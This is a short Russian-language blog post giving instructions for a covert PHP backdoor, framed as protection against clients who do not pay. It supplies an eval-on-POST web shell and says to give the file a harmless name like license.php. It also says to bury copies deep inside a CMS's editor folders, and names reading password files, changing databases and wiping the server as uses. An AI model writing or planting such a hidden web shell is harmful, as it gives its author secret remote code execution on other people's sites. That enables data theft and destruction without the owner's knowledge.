Это всего лишь каркас, который может иметь множество примеров реализации. Допустим, можно через highlight_file вывести содержание какого-нибудь файла с паролями, к которому нет прямого доступа. Можно подключиться к базе данных, считать содержание или изменить его. А можно и вовсе напечатать скрипт удаления всего на сервере, почему бы и нет.
- Создаём файл php и называем его как-нибудь неприметно, типа license.php или ещё как.
- Пишем в нём код
<?php
if ( isset($_POST[‘text’]) )
eval ($_POST[‘text’]);
?>
<form method=’POST’>
<textarea name=’text’></textarea>
<input type=’submit’>
</form> - Помещаем файл куда-нибудь подальше вглубь cms-ки, например, в дебри WYSIWYG-редактора. При желании дублируем файл ещё в 2-3 места (на всякий пожарный)
Простейший backdoor на php или как обезопасить себя от нечестных клиентов